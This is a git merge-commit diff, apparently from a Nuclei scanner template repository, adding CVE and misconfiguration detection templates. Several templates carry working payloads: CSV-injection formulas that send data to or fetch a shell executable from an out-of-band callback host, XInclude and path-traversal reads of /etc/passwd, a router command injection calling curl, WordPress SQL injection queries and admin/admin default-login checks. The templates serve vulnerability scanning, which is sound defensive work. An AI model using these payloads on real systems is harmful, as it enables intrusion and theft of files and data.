Merge branch 'main' into rule-add-v156
Ritik Chaddha
GitHub
commit
c0b948143d
|
|
@ -3,18 +3,40 @@ on:
|
|||
push:
|
||||
paths:
|
||||
- '.new-additions'
|
||||
- 'dast/vulnerabilities/injection/csv-injection.yaml'
|
||||
- 'dast/vulnerabilities/injection/xinclude-injection.yaml'
|
||||
- 'http/cves/2023/CVE-2023-3380.yaml'
|
||||
- 'http/cves/2023/CVE-2023-41599.yaml'
|
||||
- 'http/cves/2023/CVE-2023-52251.yaml'
|
||||
- 'http/cves/2024/CVE-2024-27292.yaml'
|
||||
- 'http/cves/2024/CVE-2024-32709.yaml'
|
||||
- 'http/cves/2024/CVE-2024-34102.yaml'
|
||||
- 'http/cves/2024/CVE-2024-37152.yaml'
|
||||
- 'http/cves/2024/CVE-2024-37881.yaml'
|
||||
- 'http/cves/2024/CVE-2024-5522.yaml'
|
||||
- 'http/cves/2024/CVE-2024-6028.yaml'
|
||||
- 'http/default-logins/apache/apache-apollo-default-login.yaml'
|
||||
- 'http/default-logins/caprover/caprover-default-login.yaml'
|
||||
- 'http/default-logins/dialogic/dialogic-xms-default-login.yaml'
|
||||
- 'http/default-logins/jeedom/jeedom-default-login.yaml'
|
||||
- 'http/exposed-panels/apache/apache-apollo-panel.yaml'
|
||||
- 'http/exposed-panels/dialogic-xms-console.yaml'
|
||||
- 'http/exposed-panels/endpoint-protector-panel.yaml'
|
||||
- 'http/exposures/backups/sql-server-dump.yaml'
|
||||
- 'http/exposures/configs/filestash-admin-config.yaml'
|
||||
- 'http/exposures/configs/neo4j-neodash-config.yaml'
|
||||
- 'http/misconfiguration/forgejo-repo-exposure.yaml'
|
||||
- 'http/misconfiguration/installer/kodbox-installer.yaml'
|
||||
- 'http/misconfiguration/installer/piwigo-installer.yaml'
|
||||
- 'http/misconfiguration/installer/poste-io-installer.yaml'
|
||||
- 'http/misconfiguration/installer/subrion-installer.yaml'
|
||||
- 'http/misconfiguration/seq-dashboard-unath.yaml'
|
||||
- 'http/technologies/neo4j-neodash-detect.yaml'
|
||||
- 'http/technologies/wordpress/plugins/chaty.yaml'
|
||||
- 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml'
|
||||
- 'http/vulnerabilities/next-js-cache-poisoning.yaml'
|
||||
- 'http/vulnerabilities/other/bagisto-csti.yaml'
|
||||
- 'http/vulnerabilities/other/sharp-printers-lfi.yaml'
|
||||
workflow_dispatch:
|
||||
jobs:
|
||||
triggerRemoteWorkflow:
|
||||
|
|
|
|||
|
|
@ -1,12 +1,34 @@
|
|||
dast/vulnerabilities/injection/csv-injection.yaml
|
||||
dast/vulnerabilities/injection/xinclude-injection.yaml
|
||||
http/cves/2023/CVE-2023-3380.yaml
|
||||
http/cves/2023/CVE-2023-41599.yaml
|
||||
http/cves/2023/CVE-2023-52251.yaml
|
||||
http/cves/2024/CVE-2024-27292.yaml
|
||||
http/cves/2024/CVE-2024-32709.yaml
|
||||
http/cves/2024/CVE-2024-34102.yaml
|
||||
http/cves/2024/CVE-2024-37152.yaml
|
||||
http/cves/2024/CVE-2024-37881.yaml
|
||||
http/cves/2024/CVE-2024-5522.yaml
|
||||
http/cves/2024/CVE-2024-6028.yaml
|
||||
http/default-logins/apache/apache-apollo-default-login.yaml
|
||||
http/default-logins/caprover/caprover-default-login.yaml
|
||||
http/default-logins/dialogic/dialogic-xms-default-login.yaml
|
||||
http/default-logins/jeedom/jeedom-default-login.yaml
|
||||
http/exposed-panels/apache/apache-apollo-panel.yaml
|
||||
http/exposed-panels/dialogic-xms-console.yaml
|
||||
http/exposed-panels/endpoint-protector-panel.yaml
|
||||
http/exposures/backups/sql-server-dump.yaml
|
||||
http/exposures/configs/filestash-admin-config.yaml
|
||||
http/exposures/configs/neo4j-neodash-config.yaml
|
||||
http/misconfiguration/forgejo-repo-exposure.yaml
|
||||
http/misconfiguration/installer/kodbox-installer.yaml
|
||||
http/misconfiguration/installer/piwigo-installer.yaml
|
||||
http/misconfiguration/installer/poste-io-installer.yaml
|
||||
http/misconfiguration/installer/subrion-installer.yaml
|
||||
http/misconfiguration/seq-dashboard-unath.yaml
|
||||
http/technologies/neo4j-neodash-detect.yaml
|
||||
http/technologies/wordpress/plugins/chaty.yaml
|
||||
http/vulnerabilities/backdoor/polyfill-backdoor.yaml
|
||||
http/vulnerabilities/next-js-cache-poisoning.yaml
|
||||
http/vulnerabilities/other/bagisto-csti.yaml
|
||||
http/vulnerabilities/other/sharp-printers-lfi.yaml
|
||||
|
|
|
|||
|
|
@ -2432,6 +2432,7 @@
|
|||
{"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"}
|
||||
{"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"}
|
||||
{"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"}
|
||||
{"ID":"CVE-2024-32709","Info":{"Name":"WP-Recall \u003c= 16.26.5 - SQL Injection","Severity":"critical","Description":"The WP-Recall Registration, Profile, Commerce \u0026 More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-32709.yaml"}
|
||||
{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
|
||||
{"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"}
|
||||
{"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"}
|
||||
|
|
@ -2446,6 +2447,7 @@
|
|||
{"ID":"CVE-2024-36412","Info":{"Name":"SuiteCRM - SQL Injection","Severity":"critical","Description":"SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-36412.yaml"}
|
||||
{"ID":"CVE-2024-36527","Info":{"Name":"Puppeteer Renderer - Directory Traversal","Severity":"medium","Description":"puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36527.yaml"}
|
||||
{"ID":"CVE-2024-36837","Info":{"Name":"CRMEB v.5.2.2 - SQL Injection","Severity":"high","Description":"SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36837.yaml"}
|
||||
{"ID":"CVE-2024-37152","Info":{"Name":"Argo CD Unauthenticated Access to sensitive setting","Severity":"medium","Description":"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37152.yaml"}
|
||||
{"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"}
|
||||
{"ID":"CVE-2024-37881","Info":{"Name":"SiteGuard WP Plugin \u003c= 1.7.6 - Login Page Disclosure","Severity":"medium","Description":"The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37881.yaml"}
|
||||
{"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"}
|
||||
|
|
|
|||
|
|
@ -1 +1 @@
|
|||
bb5f402eb81b9390ee8af7f9d9b96bdf
|
||||
b82d2c5137c0d383e1c0baa678ff77cb
|
||||
|
|
|
|||
|
|
@ -0,0 +1,49 @@
|
|||
id: csv-injection
|
||||
|
||||
info:
|
||||
name: CSV Injection Detection
|
||||
author: DhiyaneshDK,ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
A CSV injection detection template to identify and prevent CSV injection vulnerabilities by using various payloads that could be interpreted as formulas by spreadsheet applications.
|
||||
tags: dast,csv,oast
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
csv_fuzz:
|
||||
- "class.module.classLoader.resources.context.configFile=http://{{interactsh-url}}"
|
||||
- 'DDE ("cmd";"/C nslookup{{interactsh-url}}";"!A0")A0'
|
||||
- "@SUM(1+9)*cmd|' /C nslookup{{interactsh-url}}'!A0"
|
||||
- "=10+20+cmd|' /C nslookup{{interactsh-url}}'!A0"
|
||||
- "=cmd|' /C nslookup{{interactsh-url}}'!'A1'"
|
||||
- "=cmd|'/C powershell IEX(wget{{interactsh-url}}/shell.exe)'!A0"
|
||||
- '=IMPORTXML(CONCAT("http://{{interactsh-url}}", CONCATENATE(A2:E2)), "//a/a10")'
|
||||
- '=IMPORTFEED(CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)))'
|
||||
- '=IMPORTHTML (CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)),"table",1)'
|
||||
- '=IMAGE("https://{{interactsh-url}}/images/srpr/logo3w.png")'
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
type: replace # replaces existing parameter value with fuzz payload
|
||||
mode: multiple # replaces all parameters value with fuzz payload
|
||||
fuzz:
|
||||
- '{{csv_fuzz}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/csv"
|
||||
- "application/csv"
|
||||
- "application/vnd.ms-excel"
|
||||
|
|
@ -0,0 +1,45 @@
|
|||
id: xinclude-injection
|
||||
|
||||
info:
|
||||
name: XInclude Injection - Detection
|
||||
author: DhiyaneshDK,ritikchaddha
|
||||
severity: high
|
||||
description: |
|
||||
XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
|
||||
reference:
|
||||
- https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks
|
||||
tags: dast,xxe,xinclude
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
xinc_fuzz:
|
||||
- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></asd>'
|
||||
- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///c:/windows/win.ini"/></asd>'
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
type: replace # replaces existing parameter value with fuzz payload
|
||||
mode: multiple # replaces all parameters value with fuzz payload
|
||||
fuzz:
|
||||
- '{{xinc_fuzz}}'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
name: linux
|
||||
part: body
|
||||
regex:
|
||||
- 'root:.*?:[0-9]*:[0-9]*:'
|
||||
|
||||
- type: word
|
||||
name: windows
|
||||
part: body
|
||||
words:
|
||||
- 'for 16-bit app support'
|
||||
# digest: 4a0a00473045022100b25c0306168fca549236f8877534a9ddbe228206ed95ba92039127e97f89c1d002207fb795beea65540ff515e458f9ccffe699c4293e15a188b9391acce754242356:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -1 +1 @@
|
|||
1.12.2
|
||||
1.12.3
|
||||
|
|
@ -1 +1 @@
|
|||
4.3.4
|
||||
4.3.5
|
||||
|
|
@ -1 +1 @@
|
|||
7.3.0
|
||||
7.3.1
|
||||
|
|
@ -1 +1 @@
|
|||
2.1.9
|
||||
2.1.10
|
||||
|
|
@ -0,0 +1 @@
|
|||
3.2.6
|
||||
|
|
@ -1 +1 @@
|
|||
trunk
|
||||
2.1.3
|
||||
|
|
@ -1 +1 @@
|
|||
5.9.24
|
||||
5.9.25
|
||||
|
|
@ -1 +1 @@
|
|||
1.31
|
||||
1.32.0
|
||||
|
|
@ -1 +1 @@
|
|||
20240308
|
||||
20240701
|
||||
|
|
@ -1 +1 @@
|
|||
1.129.1
|
||||
1.130.0
|
||||
|
|
@ -1 +1 @@
|
|||
18.6.1
|
||||
18.7.0
|
||||
|
|
@ -1 +1 @@
|
|||
13.5
|
||||
13.6
|
||||
|
|
@ -1 +1 @@
|
|||
3.2.47
|
||||
3.2.48
|
||||
|
|
@ -1 +1 @@
|
|||
1.8.7
|
||||
1.8.8
|
||||
|
|
@ -1 +1 @@
|
|||
4.53.0
|
||||
4.54.0
|
||||
|
|
@ -1 +1 @@
|
|||
5.9.9
|
||||
5.9.10
|
||||
|
|
@ -1 +1 @@
|
|||
3.8.4
|
||||
3.8.5
|
||||
|
|
@ -1 +1 @@
|
|||
2.2.9
|
||||
2.3.0
|
||||
|
|
@ -1 +1 @@
|
|||
2.16.2
|
||||
2.16.3
|
||||
|
|
@ -1 +1 @@
|
|||
2.9.6
|
||||
2.9.7
|
||||
|
|
@ -1 +1 @@
|
|||
4.10.35
|
||||
4.10.36
|
||||
|
|
@ -1 +1 @@
|
|||
2.29.17
|
||||
2.29.18
|
||||
|
|
@ -1 +1 @@
|
|||
1.62.1
|
||||
1.62.2
|
||||
|
|
@ -1 +1 @@
|
|||
2.8.0
|
||||
2.8.1
|
||||
|
|
@ -1 +1 @@
|
|||
1.24.3
|
||||
1.24.4
|
||||
|
|
@ -1 +1 @@
|
|||
1.2.27
|
||||
1.3.0
|
||||
|
|
@ -1 +1 @@
|
|||
2.8.0
|
||||
2.8.1
|
||||
|
|
@ -1 +1 @@
|
|||
2.6.0
|
||||
2.6.1
|
||||
|
|
@ -1 +1 @@
|
|||
22.9
|
||||
23.0
|
||||
|
|
@ -1 +1 @@
|
|||
3.4.0
|
||||
3.4.2
|
||||
|
|
@ -1 +1 @@
|
|||
7.9.1
|
||||
7.9.2
|
||||
|
|
@ -1 +1 @@
|
|||
1.8.9.4
|
||||
1.8.9.5
|
||||
|
|
@ -1 +1 @@
|
|||
0.9.102
|
||||
0.9.103
|
||||
|
|
@ -0,0 +1,62 @@
|
|||
id: CVE-2023-3380
|
||||
|
||||
info:
|
||||
name: WAVLINK WN579X3 - Remote Command Execution
|
||||
author: pussycat0x
|
||||
severity: critical
|
||||
description: |
|
||||
Remote Command Execution vulnerability in WAVLINK WN579X3 routers via pingIp parameter in /cgi-bin/adm.cgi.
|
||||
reference:
|
||||
- https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md
|
||||
- https://vuldb.com/?ctiid.232236
|
||||
- https://vuldb.com/?id.232236
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-3380
|
||||
cwe-id: CWE-74
|
||||
epss-score: 0.00064
|
||||
epss-percentile: 0.26519
|
||||
cpe: cpe:2.3:o:wavlink:wn579x3_firmware:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: wavlink
|
||||
product: wn579x3_firmware
|
||||
shodan-query: http.html:"Wavlink"
|
||||
tags: cve,cve2023,wavlink,rce
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "images/WAVLINK-logo.png"
|
||||
- "<title>Wi-Fi APP Login</title>"
|
||||
condition: and
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
POST /cgi-bin/adm.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{RootURL}}/ping.shtml
|
||||
|
||||
page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100be619f43d5ece6eb354358b4e2b33fa9a6caca6802adf62d685ab48171ebc1c7022100af1ecda3534437a6f4c1cdd7c8045a977140ae8059c061d71f15e68b6d489268:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2024-27292
|
||||
|
||||
info:
|
||||
name: Docassemble - Local File Inclusion
|
||||
author: johnk3r
|
||||
severity: high
|
||||
description: |
|
||||
Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
|
||||
reference:
|
||||
- https://tantosec.com/blog/docassemble/
|
||||
- https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
|
||||
- https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2024-27292
|
||||
cwe-id: CWE-706
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.0866
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: http.title:"docassemble"
|
||||
fofa-query: icon_hash="-575790689"
|
||||
tags: cve,cve2024,docassemble,lfi
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/interview?i=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 501
|
||||
# digest: 4b0a00483046022100d8b89e9955181d9c42c128bf1113ced63499aabac72a131110385c0d688d14cd022100c3821f365b88c32e60e587c998e270a901c7bf42808ab259453168ca771c16d8:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2024-32709
|
||||
|
||||
info:
|
||||
name: WP-Recall <= 16.26.5 - SQL Injection
|
||||
author: securityforeveryone
|
||||
severity: critical
|
||||
description: |
|
||||
The WP-Recall Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
|
||||
remediation: Fixed in 16.26.6
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-32709
|
||||
- https://github.com/truonghuuphuc/CVE-2024-32709-Poc
|
||||
- https://patchstack.com/database/vulnerability/wp-recall/wordpress-wp-recall-plugin-16-26-5-sql-injection-vulnerability?_s_id=cve
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
|
||||
cvss-score: 9.3
|
||||
cve-id: CVE-2024-32709
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.0866
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
publicwww-query: "/wp-content/plugins/wp-recall/"
|
||||
tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp,sqli
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '{{md5(num)}}'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a004630440220133ca9cf2f1029c377a0637602b2f99279abe7bbcad1da1f3e66733f6563d26e02207da0cf317afc9c589b8a2c4e7551e7613d75b026f1d89f2fd06642435a38b96f:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2024-5522
|
||||
|
||||
info:
|
||||
name: WordPress HTML5 Video Player < 2.5.27 - SQL Injection
|
||||
author: JohnDoeAnonITA
|
||||
severity: critical
|
||||
description: |
|
||||
The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
|
||||
remediation: Fixed in 2.5.27
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-5522
|
||||
classification:
|
||||
cvss-score: 9.8
|
||||
cwe-id: CWE-89
|
||||
cve-id: CVE-2024-5522
|
||||
epss-score: 0.04
|
||||
epss-percentile: 9
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
publicwww-query: "/wp-content/plugins/html5-video-player"
|
||||
tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '{{md5(num)}}'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100a7dc1f22e4c4cf656939c0f9bc502d05a891595332a3e83cf4cfd8ffd2e0d7a102200d946db71e2e8b7619b89fb20cfde7a02ba86c20f8087d397dd795a20e5c1187:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,48 @@
|
|||
id: apache-apollo-default-login
|
||||
|
||||
info:
|
||||
name: Apache Apollo - Default Login
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"Apache Apollo"
|
||||
tags: apache,apollo,default-login,misconfig
|
||||
|
||||
variables:
|
||||
username: 'admin'
|
||||
password: 'admin'
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/json/session/signin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
username={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
GET /console/index.html HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body_1
|
||||
regex:
|
||||
- '^\s*true\s*$'
|
||||
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- '<strong>Log Details:'
|
||||
- 'Store Status'
|
||||
- 'Logout</a>'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a004630440220316d56568350165547ed1cb488565e14ecae67a775aea47af5d671124b563a5b022040877ad8cc3beae83a8717a9b7d014c5216d3b5acabd097d97d2cdeea26ee151:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -32,3 +32,4 @@ http:
|
|||
- 'contains(header, "application/json")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
# digest: 490a0046304402204bdf83b16de402f0c591fab183bbd2f05b6bad96ca4cbc5d6383a0b3d5d99a52022068a6d61a5d5f63fa63a5ceb4e30974ae01daf30dcc15e6ef920763dfa0dc10c3:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,45 @@
|
|||
id: dialogic-xms-default-login
|
||||
|
||||
info:
|
||||
name: Dialogic XMS Admin Console - Default Login
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: |
|
||||
Dialogic XMS Admin Console was using default credentials and it was discovered.
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"Dialogic XMS Admin Console"
|
||||
tags: dialogic,admin,default-login
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.php/verifyLogin/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
usernameId={{username}}&passwordId={{password}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- admin
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'DialogicDojo'
|
||||
- 'userId">user:'
|
||||
- 'var downloads'
|
||||
- 'onclick="logout'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a00463044022100bb438b77aab69bf23ecaff901d2ae764492c3198dd258f86807c090d548a7f79021f762e3ac6e41662c24d0986e227981aa1621ba654bcf0a95b88be934e4a15ef:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -44,3 +44,4 @@ http:
|
|||
- "logout=1"
|
||||
- "Plugins</span>"
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100d838f2114c2e5ad9fa46212ed4bde036770bbcc1d6f86e788eb2c472bc20b14f0220757a748fbfb0168ebf6df5b34ce6c2b8490928a8ddd47a17937ce345d4211253:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -22,7 +22,7 @@ http:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'user-info">anonymous"'
|
||||
- '"user-info">anonymous</span>'
|
||||
- 'My View'
|
||||
- 'Roadmap'
|
||||
condition: and
|
||||
|
|
@ -30,4 +30,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
